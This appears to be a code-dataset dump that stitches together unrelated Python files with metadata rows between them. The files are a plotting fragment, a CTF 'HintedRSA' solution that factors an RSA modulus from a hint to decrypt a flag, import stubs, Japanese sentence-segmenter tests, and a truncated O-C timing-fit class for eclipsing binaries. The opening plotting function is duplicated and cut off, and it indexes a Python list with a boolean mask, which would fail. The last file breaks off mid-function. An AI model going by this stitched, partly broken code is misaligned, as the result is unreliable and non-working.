Plot a histogram of detected and non-detected planets
'''
masses = [planet_table_entry['PlanetMass'].to(u.earthMass).value for planet_table_entry in planet_table]
fig = plt.figure(figsize=(7,4))
ax1 = fig.add_subplot(111)
ax1.hist(masses[~detected],label="Non-Detections",density=True,**kwargs)
ax1.hist(masses[detected],label="Detections",density=True,**kwargs)
ax1.set_xlabel(r"Planet Masses [M$_{Earth}$]")
ax1.set_ylabel(r"Number of Planets")
ax1.set_xscale("log")
def plot_detected_planet_mass(planet_table,detected,show=True,**kwargs):
'''
Plot a histogram of detected and non-detected planets
'''
masses = [planet_table_entry['PlanetMass'].to(u.earthMass) for planet_table_entry in planet_table]
fig = plt.figure(figsize=(7,4))
ax1 = fig.add_subplot(111)
ax1.hist(masses[~detected],label="Non-Detections",density=True,**kwargs)
ax1.hist(masses[detected],label="Detections",density=True,**kwargs)
ax1.set_xlabel(r"Planet Masses [M$_{Earth}$]")
ax1.set_ylabel(r"Number of Planets")
ax1.set_xscale("log")
| 39.992278 | 146 | 0.652249 | 1,484 | 10,358 | 4.41442 | 0.17655 | 0.042742 | 0.032056 | 0.036941 | 0.880629 | 0.877576 | 0.874523 | 0.869028 | 0.863532 | 0.863532 | 0 | 0.019978 | 0.217127 | 10,358 | 258 | 147 | 40.147287 | 0.78789 | 0.328056 | 0 | 0.567797 | 0 | 0.008475 | 0.129903 | 0.009247 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042373 | false | 0.008475 | 0.033898 | 0 | 0.09322 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0693fd8a01b440c548bf2536b77d01d3b95da158 | 3,406 | py | Python | 2021_2022/Training_4/HintedRSA/solution.py | 0awawa0/DonNU_CTF | 7ff693fdba4609298f5556ea583fe604980d76e3 | [
"MIT"
] | null | null | null | 2021_2022/Training_4/HintedRSA/solution.py | 0awawa0/DonNU_CTF | 7ff693fdba4609298f5556ea583fe604980d76e3 | [
"MIT"
] | null | null | null | 2021_2022/Training_4/HintedRSA/solution.py | 0awawa0/DonNU_CTF | 7ff693fdba4609298f5556ea583fe604980d76e3 | [
"MIT"
] | null | null | null | from Crypto.Util.number import *
import math
e = 0x10001
n = 961445943888840215288522754445026510743473076689337403144333879593463986904364838586170835699906384781631370662475639324609992342202744355850521358342756784958571627256586576603747473312986793639711869303614648034309510362586032534553676611139684528340669137800132095540828987059037945826668054627229536701654799350190693339345773272684185950853726035582289056182952711528893421846450008777325825518751410357496204404638124992850696705297926925942843156249125267571732411616928549217068784261779096096116285770653408770412816712664990337620697198329515736340588923502218943033737818780630916504373625971629585365099608419665523139870152782000960802873800617483602090708260029548201486307388077222745140335031113084587060514626869798229561867450052261444604341286267726161542875461565719051806401057802593637597871730432878746248940478326738376188681495157789160173198368548918389993423034042982000430406946619608859317825006843594886289551548098171546894532838002331869549223361863251792070063165159443859273559193728045568032323867575542466285105706485187340015247513937186233153535342456246038871755650644332881502204306341873138389443855475270030618258630527202615235441291881951077160520297481033188742900514275391432363246564953
hint = 641167744111181547085698318848049827218611202952975380836404920734648147042569164578845679054520345179725998820497569101734143784972214855548118863772149865409322883301737334313506194806480286558215119628369186685004818260884436933579797143628928614089383326340995583270805705607705019753787859390550257106618572999144788422058693888990601688282495798350816569373743430401624935468867426546771066454036148566866193789737078102003829249471031847499913147940534322480431303615774271140856898567171939734089675322666015183135935549042775562209968532773537346411500071882711882681619923686098566531960758728136626351473
c = 394829496153226615079106845467776028366140295342347876510040454366361044598513881356450574623503480681255015968436969691951393558048412880463905121742431156051565692937669727273900950066509540982565422053463968010457097616902036770236581183869679426210320540792395066217390317300709663531949422444177368146146490400165500157782436434933232777495959326597493059454967527212485176581857254955923786937274115250081553847466264173157144568090315577326717838927510944185666938055684082409086247191917904923872982647814928313365157444331282503927018395361965287602364461132931608856111284092368985337210080787574611707884767727233786809687914173554665342434128666744768281530778129813443424112316349497034849892546233762211320003738980010791628941095440130956466412986267244043634258014478584920306306760563851795725646316495957472124535287163443297948654638053816084809517981349651550833453213804078846493192519304479047589197564446335434607426688649741459861332554359842892770299199242653988650692814695370219260616932781666464355751249300729614798286334219273128642356612262798872107993509667710065537291251345498592539451641320735486139103181843064733191243637002061733376567254295975945106413969502225896685709871388884681785343334722
t = math.isqrt((hint - 1) ** 2 + 4 * n)
p1 = (hint - 1 + t) // 2
p2 = (hint - 1 - t) // 2
p = 0
if p1 < 0:
p = p2
else:
p = p1
q = n // p
assert p * q == n
f = (p - 1) * (q - 1)
d = pow(e, -1, f)
flag = pow(c, d, n)
print(long_to_bytes(flag)) | 131 | 1,237 | 0.951262 | 70 | 3,406 | 46.257143 | 0.5 | 0.004632 | 0.003706 | 0.004324 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.938615 | 0.029066 | 3,406 | 26 | 1,238 | 131 | 0.04052 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002055 | 0 | 0.05 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.05 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
23002fc988959e7c3403bed99ad88400b09bf097 | 173 | py | Python | src/drem/download/download.py | oisindoherty3/drem | 478fe4e72fd38628f4ddc3745c16efe75ee98e4d | [
"MIT"
] | 4 | 2020-07-21T12:18:53.000Z | 2020-11-19T12:30:56.000Z | src/drem/download/download.py | oisindoherty3/drem | 478fe4e72fd38628f4ddc3745c16efe75ee98e4d | [
"MIT"
] | 101 | 2020-08-20T16:29:44.000Z | 2021-01-13T12:41:53.000Z | src/drem/download/download.py | oisindoherty3/drem | 478fe4e72fd38628f4ddc3745c16efe75ee98e4d | [
"MIT"
] | 5 | 2020-07-31T11:51:30.000Z | 2020-10-14T10:25:39.000Z | # flake8: noqa
from drem.download.ber_publicsearch import DownloadBERPublicsearch as BERPublicsearch
from drem.download.vo import DownloadValuationOffice as ValuationOffice
| 43.25 | 85 | 0.878613 | 19 | 173 | 7.947368 | 0.736842 | 0.10596 | 0.211921 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006329 | 0.086705 | 173 | 3 | 86 | 57.666667 | 0.949367 | 0.069364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2308f83fc0c3a0f50b7d057911070c231db43a9c | 5,981 | py | Python | tests/common/test_pipeline.py | wwwcojp/ja_sentence_segmenter | 282661a059bbed3daecda6487462a4715501e832 | [
"MIT"
] | 43 | 2019-12-15T23:40:17.000Z | 2022-03-01T11:46:01.000Z | tests/common/test_pipeline.py | wwwcojp/ja_sentence_segmenter | 282661a059bbed3daecda6487462a4715501e832 | [
"MIT"
] | 1 | 2019-12-31T01:41:12.000Z | 2020-02-22T16:13:04.000Z | tests/common/test_pipeline.py | wwwcojp/ja_sentence_segmenter | 282661a059bbed3daecda6487462a4715501e832 | [
"MIT"
] | 1 | 2022-02-25T13:22:23.000Z | 2022-02-25T13:22:23.000Z | """PragmaticSegmenterと同等の処理が可能かチェック.
参考:https://github.com/diasks2/pragmatic_segmenter/blob/master/spec/pragmatic_segmenter/languages/japanese_spec.rb
"""
import functools
import pytest
from ja_sentence_segmenter.common.pipeline import make_pipeline
from ja_sentence_segmenter.concatenate.simple_concatenator import concatenate_matching
from ja_sentence_segmenter.normalize.neologd_normalizer import normalize
from ja_sentence_segmenter.split.simple_splitter import split_newline, split_punctuation
def test_pipeline() -> None:
split_punc2 = functools.partial(split_punctuation, punctuations=r"。!?")
concat_tail_no = functools.partial(concatenate_matching, former_matching_rule=r"^(?P<result>.+)(の)$", remove_former_matched=False)
segmenter = make_pipeline(normalize, split_newline, concat_tail_no, split_punc2)
# Golden Rule: Simple period to end sentence #001
text1 = "これはペンです。それはマーカーです。"
assert list(segmenter(text1)) == ["これはペンです。", "それはマーカーです。"]
# Golden Rule: Question mark to end sentence #002
text2 = "それは何ですか?ペンですか?"
assert list(segmenter(text2)) == ["それは何ですか?", "ペンですか?"]
# Golden Rule: Exclamation point to end sentence #003
text3 = "良かったね!すごい!"
assert list(segmenter(text3)) == ["良かったね!", "すごい!"]
# Golden Rule: Quotation #004
text4 = "自民党税制調査会の幹部は、「引き下げ幅は3.29%以上を目指すことになる」と指摘していて、今後、公明党と合意したうえで、30日に決定する与党税制改正大綱に盛り込むことにしています。2%台後半を目指すとする方向で最終調整に入りました。"
assert list(segmenter(text4)) == [
"自民党税制調査会の幹部は、「引き下げ幅は3.29%以上を目指すことになる」と指摘していて、今後、公明党と合意したうえで、30日に決定する与党税制改正大綱に盛り込むことにしています。",
"2%台後半を目指すとする方向で最終調整に入りました。",
]
# Golden Rule: Errant newlines in the middle of sentences #005
text5 = "これは父の\n家です。"
assert list(segmenter(text5)) == ["これは父の家です。"]
# segment: correctly segments text #001
text6 = "これは山です \nこれは山です \nこれは山です(「これは山です」) \nこれは山です(これは山です「これは山です」)これは山です・これは山です、これは山です。 \nこれは山です(これは山です。これは山です)。これは山です、これは山です、これは山です、これは山です(これは山です。これは山です)これは山です、これは山です、これは山です「これは山です」これは山です(これは山です:0円)これは山です。 \n1.)これは山です、これは山です(これは山です、これは山です6円(※1))これは山です。 \n※1 これは山です。 \n2.)これは山です、これは山です、これは山です、これは山です。 \n3.)これは山です、これは山です・これは山です、これは山です、これは山です、これは山です(これは山です「これは山です」)これは山です、これは山です、これは山です、これは山です。 \n4.)これは山です、これは山です(これは山です、これは山です、これは山です。これは山です)これは山です、これは山です(これは山です、これは山です)。 \nこれは山です、これは山です、これは山です、これは山です、これは山です(者)これは山です。 \n(1) 「これは山です」(これは山です:0円) (※1) \n① これは山です"
assert list(segmenter(text6)) == [
"これは山です",
"これは山です",
"これは山です(「これは山です」)",
"これは山です(これは山です「これは山です」)これは山です・これは山です、これは山です。",
"これは山です(これは山です。これは山です)。",
"これは山です、これは山です、これは山です、これは山です(これは山です。これは山です)これは山です、これは山です、これは山です「これは山です」これは山です(これは山です:0円)これは山です。",
"1.)これは山です、これは山です(これは山です、これは山です6円(※1))これは山です。",
"※1これは山です。",
"2.)これは山です、これは山です、これは山です、これは山です。",
"3.)これは山です、これは山です・これは山です、これは山です、これは山です、これは山です(これは山です「これは山です」)これは山です、これは山です、これは山です、これは山です。",
"4.)これは山です、これは山です(これは山です、これは山です、これは山です。これは山です)これは山です、これは山です(これは山です、これは山です)。",
"これは山です、これは山です、これは山です、これは山です、これは山です(者)これは山です。",
"(1)「これは山です」(これは山です:0円)(※1)",
"① これは山です",
]
# segment: correctly segments text #002
text7 = "フフーの\n主たる債務"
assert list(segmenter(text7)) == ["フフーの主たる債務"]
# segment: correctly segments text #003
# Pragmatic Segmenterはピリオドの扱いをかなり頑張っているので、対応できませんでした・・・
# text8 = "これは山です \nこれは山です \nこれは山です(「これは山です」) \nこれは山です(これは山です「これは山です」)これは山です・これは山です、これは山です. \nこれは山です(これは山です.これは山です).これは山です、これは山です、これは山です、これは山です(これは山です.これは山です)これは山です、これは山です、これは山です「これは山です」これは山です(これは山です:0円)これは山です. \n1.)これは山です、これは山です(これは山です、これは山です6円(※1))これは山です. \n※1 これは山です. \n2.)これは山です、これは山です、これは山です、これは山です. \n3.)これは山です、これは山です・これは山です、これは山です、これは山です、これは山です(これは山です「これは山です」)これは山です、これは山です、これは山です、これは山です. \n4.)これは山です、これは山です(これは山です、これは山です、これは山です.これは山です)これは山です、これは山です(これは山です、これは山です). \nこれは山です、これは山です、これは山です、これは山です、これは山です(者)これは山です. \n(1) 「これは山です」(これは山です:0円) (※1) \n① これは山です"
# assert list(segmenter(text8)) == [
# "これは山です",
# "これは山です",
# "これは山です(「これは山です」)",
# "これは山です(これは山です「これは山です」)これは山です・これは山です、これは山です.",
# "これは山です(これは山です.これは山です).",
# "これは山です、これは山です、これは山です、これは山です(これは山です.これは山です)これは山です、これは山です、これは山です「これは山です」これは山です(これは山です:0円)これは山です.",
# "1.)これは山です、これは山です(これは山です、これは山です6円(※1))これは山です.",
# "※1これは山です.",
# "2.)これは山です、これは山です、これは山です、これは山です.",
# "3.)これは山です、これは山です・これは山です、これは山です、これは山です、これは山です(これは山です「これは山です」)これは山です、これは山です、これは山です、これは山です.",
# "4.)これは山です、これは山です(これは山です、これは山です、これは山です.これは山です)これは山です、これは山です(これは山です、これは山です).",
# "これは山です、これは山です、これは山です、これは山です、これは山です(者)これは山です.",
# "(1)「これは山です」(これは山です:0円)(※1)",
# "① これは山です",
# ]
# segment: correctly segments text #004
text9 = "これは山です \nこれは山です \nこれは山です(「これは山です」) \nこれは山です(これは山です「これは山です」)これは山です・これは山です、これは山です! \nこれは山です(これは山です!これは山です)!これは山です、これは山です、これは山です、これは山です(これは山です!これは山です)これは山です、これは山です、これは山です「これは山です」これは山です(これは山です:0円)これは山です! \n1.)これは山です、これは山です(これは山です、これは山です6円(※1))これは山です! \n※1 これは山です! \n2.)これは山です、これは山です、これは山です、これは山です! \n3.)これは山です、これは山です・これは山です、これは山です、これは山です、これは山です(これは山です「これは山です」)これは山です、これは山です、これは山です、これは山です! \n4.)これは山です、これは山です(これは山です、これは山です、これは山です!これは山です)これは山です、これは山です(これは山です、これは山です)! \nこれは山です、これは山です、これは山です、これは山です、これは山です(者)これは山です! \n(1) 「これは山です」(これは山です:0円) (※1) \n① これは山です"
assert list(segmenter(text9)) == [
"これは山です",
"これは山です",
"これは山です(「これは山です」)",
"これは山です(これは山です「これは山です」)これは山です・これは山です、これは山です!",
"これは山です(これは山です!これは山です)!",
"これは山です、これは山です、これは山です、これは山です(これは山です!これは山です)これは山です、これは山です、これは山です「これは山です」これは山です(これは山です:0円)これは山です!",
"1.)これは山です、これは山です(これは山です、これは山です6円(※1))これは山です!",
"※1これは山です!",
"2.)これは山です、これは山です、これは山です、これは山です!",
"3.)これは山です、これは山です・これは山です、これは山です、これは山です、これは山です(これは山です「これは山です」)これは山です、これは山です、これは山です、これは山です!",
"4.)これは山です、これは山です(これは山です、これは山です、これは山です!これは山です)これは山です、これは山です(これは山です、これは山です)!",
"これは山です、これは山です、これは山です、これは山です、これは山です(者)これは山です!",
"(1)「これは山です」(これは山です:0円)(※1)",
"① これは山です",
]
| 56.424528 | 566 | 0.69888 | 754 | 5,981 | 5.543767 | 0.171088 | 0.835407 | 1.020574 | 1.136842 | 0.695455 | 0.695455 | 0.695455 | 0.695455 | 0.695455 | 0.695455 | 0 | 0.025492 | 0.134258 | 5,981 | 105 | 567 | 56.961905 | 0.775396 | 0.301622 | 0 | 0.169492 | 0 | 0.135593 | 0.604595 | 0.501088 | 0 | 0 | 0 | 0 | 0.135593 | 1 | 0.016949 | false | 0 | 0.101695 | 0 | 0.118644 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2335df1c8a4c83d214e26d98a18fb495f1c55a1e | 194 | py | Python | engine/omega_engine/core/utils/camera/__init__.py | jadsonlucio/Opengl-CG-Project | 47b50bf93b8d3a1ccef1f41f22ed3327d9496b8c | [
"MIT"
] | null | null | null | engine/omega_engine/core/utils/camera/__init__.py | jadsonlucio/Opengl-CG-Project | 47b50bf93b8d3a1ccef1f41f22ed3327d9496b8c | [
"MIT"
] | 3 | 2021-06-08T20:54:18.000Z | 2022-03-12T00:13:46.000Z | engine/omega_engine/core/utils/camera/__init__.py | jadsonlucio/Opengl-CG-Project | 47b50bf93b8d3a1ccef1f41f22ed3327d9496b8c | [
"MIT"
] | null | null | null | from .camera import Camera
from .camera_3rd_person import Camera3RDPerson
from .camera_airplane import CameraAirPlane
from .camera_viewup import ViewUpCamera
from .multi_camera import MultCamera | 38.8 | 46 | 0.876289 | 25 | 194 | 6.6 | 0.48 | 0.242424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011429 | 0.097938 | 194 | 5 | 47 | 38.8 | 0.931429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2379f636e97f2f8941b5bc550928dd9f4a81fc33 | 54 | py | Python | src/jsdtools/dot/__init__.py | gulan/jsdtools | 1707f7c1571dcde6eac456caadb625f691a16bba | [
"0BSD"
] | null | null | null | src/jsdtools/dot/__init__.py | gulan/jsdtools | 1707f7c1571dcde6eac456caadb625f691a16bba | [
"0BSD"
] | 4 | 2018-09-04T14:40:24.000Z | 2018-09-04T19:36:27.000Z | src/jsdtools/dot/__init__.py | gulan/jsdtools | 1707f7c1571dcde6eac456caadb625f691a16bba | [
"0BSD"
] | null | null | null | #!python
from .render import (print_one, print_many)
| 13.5 | 43 | 0.759259 | 8 | 54 | 4.875 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12963 | 54 | 3 | 44 | 18 | 0.829787 | 0.12963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
0013ff889501f1a2bd5ba07d6c8de316de350bc2 | 117,441 | py | Python | py2/OCFit/OC_class.py | pavolgaj/OCF | 8df25bf69f63e4b4385ed5554c458b1da4281823 | [
"MIT"
] | 3 | 2017-11-23T10:21:03.000Z | 2019-05-29T16:18:13.000Z | py2/OCFit/OC_class.py | pavolgaj/OCF | 8df25bf69f63e4b4385ed5554c458b1da4281823 | [
"MIT"
] | 7 | 2018-12-05T08:21:37.000Z | 2021-06-21T16:07:46.000Z | py2/OCFit/OC_class.py | pavolgaj/OCF | 8df25bf69f63e4b4385ed5554c458b1da4281823 | [
"MIT"
] | 3 | 2019-02-18T12:32:26.000Z | 2021-12-01T14:06:54.000Z | # -*- coding: utf-8 -*-
#main classes of OCFit package
#version 0.1.6
#update: 7.10.2021
# (c) Pavol Gajdos, 2018-2021
from time import time
import sys
import os
import threading
import warnings
import pickle
#import matplotlib
try:
import matplotlib.pyplot as mpl
fig=mpl.figure()
mpl.close(fig)
except:
#import on server without graphic output
try: mpl.switch_backend('Agg')
except:
import matplotlib
matplotlib.reload(matplotlib)
matplotlib.use('Agg',force=True)
import matplotlib.pyplot as mpl
from matplotlib import gridspec
mpl.style.use('classic')
import numpy as np
try: import pymc
except: warnings.warn('Module pymc not found! Using FitMC will not be possible!')
from .ga import TPopul
from .info_ga import InfoGA as InfoGAClass
from .info_mc import InfoMC as InfoMCClass
#some constants
AU=149597870700 #astronomical unit in meters
c=299792458 #velocity of light in meters per second
day=86400. #number of seconds in day
minutes=1440. #number of minutes in day
def GetMax(x,n):
'''return n max values in array x'''
temp=[]
x=np.array(x)
for i in range(n):
temp.append(np.argmax(x))
x[temp[-1]]=0
return np.array(temp)
class SimpleFit():
'''class with common function for FitLinear and FitQuad'''
def __init__(self,t,t0,P,oc=None,err=None):
'''input: observed time, time of zeros epoch, period, (O-C values, errors)'''
self.t=np.array(t) #times
#linear ephemeris of binary
self.P=P
self.t0=t0
self._t0P=[t0,P] #given linear ephemeris of binary
if oc is None:
#calculate O-C
self.Epoch()
tC=t0+P*self.epoch
self.oc=self.t-tC
else: self.oc=np.array(oc)
if err is None:
#errors not given
self.err=np.ones(self.t.shape)
self._set_err=False
else:
#errors given
self.err=np.array(err)
self._set_err=True
self._corr_err=False
self._calc_err=False
self._old_err=[]
#sorting data...
self._order=np.argsort(self.t)
self.t=self.t[self._order] #times
self.oc=self.oc[self._order] #O-Cs
self.err=self.err[self._order] #errors
self.Epoch()
self.params={} #values of parameters
self.params_err={} #errors of fitted parameters
self.model=[] #model O-C
self.new_oc=[] #new O-C (residue)
self.chi=0
self._robust=False
self._mcmc=False
self.tC=[]
def Epoch(self):
'''calculate epoch'''
self.epoch=np.round((self.t-self.t0)/self.P*2)/2.
return self.epoch
def PhaseCurve(self,P,t0,plot=False):
'''create phase curve'''
f=np.mod(self.t-t0,P)/float(P) #phase
order=np.argsort(f)
f=f[order]
oc=self.oc[order]
if plot:
mpl.figure()
if self._set_err: mpl.errorbar(f,oc,yerr=self.err,fmt='o')
else: mpl.plot(f,oc,'.')
return f,oc
def Summary(self,name=None):
'''parameters summary, writting to file "name"'''
params=self.params.keys()
units={'t0':'JD','P':'d','Q':'d'}
text=['parameter'.ljust(15,' ')+'unit'.ljust(10,' ')+'value'.ljust(30,' ')+'error']
for p in sorted(params):
text.append(p.ljust(15,' ')+units[p].ljust(10,' ')+str(self.params[p]).ljust(30,' ')
+str(self.params_err[p]).ljust(20,' '))
text.append('')
if self._robust: text.append('Fitting method: Robust regression')
elif self._mcmc: text.append('Fitting method: MCMC')
else: text.append('Fitting method: Standard regression')
g=len(params)
n=len(self.t)
text.append('chi2 = '+str(self.chi))
if n-g>0: text.append('chi2_r = '+str(self.chi/(n-g)))
else: text.append('chi2_r = NA')
text.append('AIC = '+str(self.chi+2*g))
if n-g-1>0: text.append('AICc = '+str(self.chi+2*g*n/(n-g-1)))
else: text.append('AICc = NA')
text.append('BIC = '+str(self.chi+g*np.log(n)))
if name is None:
print '------------------------------------'
for t in text: print t
print '------------------------------------'
else:
f=open(name,'w')
for t in text: f.write(t+'\n')
f.close()
def InfoMCMC(self,db,eps=False,geweke=False):
'''statistics about GA fitting'''
info=InfoMCClass(db)
info.AllParams(eps)
for p in info.pars: info.OneParam(p,eps)
if geweke: info.Geweke(eps)
def CalcErr(self):
'''calculate errors according to current model'''
n=len(self.model)
err=np.sqrt(sum((self.oc-self.model)**2)/(n*(n-1)))
errors=err*np.ones(self.model.shape)*np.sqrt(n-len(self.params))
chi=sum(((self.oc-self.model)/errors)**2)
print 'New chi2:',chi,chi/(n-len(self.params))
self._calc_err=True
self._set_err=False
self.err=errors
return errors
def CorrectErr(self):
'''scaling errors according to current model'''
n=len(self.model)
chi0=sum(((self.oc-self.model)/self.err)**2)
alfa=chi0/(n-2)
err=self.err*np.sqrt(alfa)
chi=sum(((self.oc-self.model)/err)**2)
print 'New chi2:',chi,chi/(n-len(self.params))
if self._set_err and len(self._old_err)==0: self._old_err=self.err
self.err=err
self._corr_err=True
return err
def AddWeight(self,weight):
'''adding weight to data + scaling according to current model
warning: weights have to be in same order as input date!
'''
if not len(weight)==len(self.t):
print 'incorrect length of "w"!'
return
weight=np.array(weight)[self._order]
err=1./weight
n=len(self.t)
chi0=sum(((self.oc-self.model)/err)**2)
alfa=chi0/(n-len(self.params))
err*=np.sqrt(alfa)
chi=sum(((self.oc-self.model)/err)**2)
print 'New chi2:',chi,chi/(n-len(self.params))
self._calc_err=True
self._set_err=False
self.err=err
return err
def SaveOC(self,name,weight=None):
'''saving O-C calculated from given ephemeris to file
name - name of file
weight - weight of data
warning: weights have to be in same order as input date!
'''
f=open(name,'w')
if weight is not None:
np.savetxt(f,np.column_stack((self.t,self.epoch,self.oc,np.array(weight)[self._order])),
fmt=["%14.7f",'%10.3f',"%+12.10f","%.10f"],delimiter=" ",
header='Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'O-C'.ljust(12,' ')+' '+'Weight')
elif self._set_err:
if self._corr_err: err=self._old_err
else: err=self.err
np.savetxt(f,np.column_stack((self.t,self.epoch,self.oc,err)),
fmt=["%14.7f",'%10.3f',"%+12.10f","%.10f"],delimiter=" ",
header='Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'O-C'.ljust(12,' ')+' '+'Error')
else:
np.savetxt(f,np.column_stack((self.t,self.epoch,self.oc)),
fmt=["%14.7f",'%10.3f',"%+12.10f"],delimiter=" ",
header='Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'O-C')
f.close()
def SaveRes(self,name,weight=None):
'''saving residue (new O-C) to file
name - name of file
weight - weight of data
warning: weights have to be in same order as input date!
'''
f=open(name,'w')
if self._set_err:
if self._corr_err: err=self._old_err
else: err=self.err
np.savetxt(f,np.column_stack((self.t,self.epoch,self.new_oc,err)),
fmt=["%14.7f",'%10.3f',"%+12.10f","%.10f"],delimiter=" ",
header='Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'new O-C'.ljust(12,' ')+' Error')
elif weight is not None:
np.savetxt(f,np.column_stack((self.t,self.epoch,self.new_oc,np.array(weight)[self._order])),
fmt=["%14.7f",'%10.3f',"%+12.10f","%.10f"],delimiter=" ",
header='Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'new O-C'.ljust(12,' ')+' Weight')
else:
np.savetxt(f,np.column_stack((self.t,self.epoch,self.new_oc)),
fmt=["%14.7f",'%10.3f',"%+12.10f"],delimiter=" ",
header='Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' new O-C')
f.close()
def PlotRes(self,name=None,no_plot=0,no_plot_err=0,eps=False,oc_min=True,
time_type='JD',offset=2400000,trans=True,title=None,epoch=False,
min_type=False,weight=None,trans_weight=False,bw=False,double_ax=False,
fig_size=None):
'''plotting residue (new O-C)
name - name of file to saving plot (if not given -> show graph)
no_plot - count of outlier point which will not be plot
no_plot_err - count of errorful point which will not be plot
eps - save also as eps file
oc_min - O-C in minutes (if False - days)
time_type - type of JD in which is time (show in x label)
offset - offset of time
trans - transform time according to offset
title - name of graph
epoch - x axis in epoch
min_type - distinction of type of minimum
weight - weight of data (shown as size of points)
trans_weight - transform weights to range (1,10)
bw - Black&White plot
double_ax - two axes -> time and epoch
fig_size - custom figure size - e.g. (12,6)
warning: weights have to be in same order as input data!
'''
if fig_size:
fig=mpl.figure(figsize=fig_size)
else:
fig=mpl.figure()
ax1=fig.add_subplot(111)
#setting labels
if epoch and not double_ax:
ax1.set_xlabel('Epoch')
x=self.epoch
elif offset>0:
ax1.set_xlabel('Time ('+time_type+' - '+str(offset)+')')
if not trans: offset=0
x=self.t-offset
else:
ax1.set_xlabel('Time ('+time_type+')')
offset=0
x=self.t
if oc_min:
ax1.set_ylabel('Residue O - C (min)')
k=minutes
else:
ax1.set_ylabel('Residue O - C (d)')
k=1
if title is not None:
if double_ax: fig.subplots_adjust(top=0.85)
fig.suptitle(title,fontsize=20)
#primary / secondary minimum
if min_type:
prim=np.where(np.round(self.epoch)==self.epoch)
sec=np.where(np.round(self.epoch)<>self.epoch)
else:
prim=np.arange(0,len(self.epoch),1)
sec=np.array([])
#set weight
set_w=False
if weight is not None:
weight=np.array(weight)[self._order]
if trans_weight:
w_min=min(weight)
w_max=max(weight)
weight=9./(w_max-w_min)*(weight-w_min)+1
if weight.shape==self.t.shape:
w=[]
levels=[0,3,5,7.9,10]
size=[3,4,5,7]
for i in range(len(levels)-1):
w.append(np.where((weight>levels[i])*(weight<=levels[i+1])))
w[-1]=np.append(w[-1],np.where(weight>levels[-1])) #if some weight is bigger than max. level
set_w=True
else:
warnings.warn('Shape of "weight" is different to shape of "time". Weight will be ignore!')
if bw: color='k'
else: color='b'
errors=GetMax(abs(self.new_oc),no_plot)
if set_w:
#using weights
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
for i in range(len(w)):
ax1.plot(x[prim[np.where(np.in1d(prim,w[i]))]],
(self.new_oc*k)[prim[np.where(np.in1d(prim,w[i]))]],color+'o',markersize=size[i])
if not len(sec)==0:
for i in range(len(w)):
ax1.plot(x[sec[np.where(np.in1d(sec,w[i]))]],
(self.new_oc*k)[sec[np.where(np.in1d(sec,w[i]))]],color+'o',markersize=size[i],
fillstyle='none',markeredgewidth=1,markeredgecolor=color)
else:
#without weight
if self._set_err:
#using errors
if self._corr_err: err=self._old_err
else: err=self.err
errors=np.append(errors,GetMax(err,no_plot_err))
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
ax1.errorbar(x[prim],(self.new_oc*k)[prim],yerr=(err*k)[prim],fmt=color+'o',markersize=5)
if not len(sec)==0:
ax1.errorbar(x[sec],(self.new_oc*k)[sec],yerr=(err*k)[sec],fmt=color+'o',markersize=5,
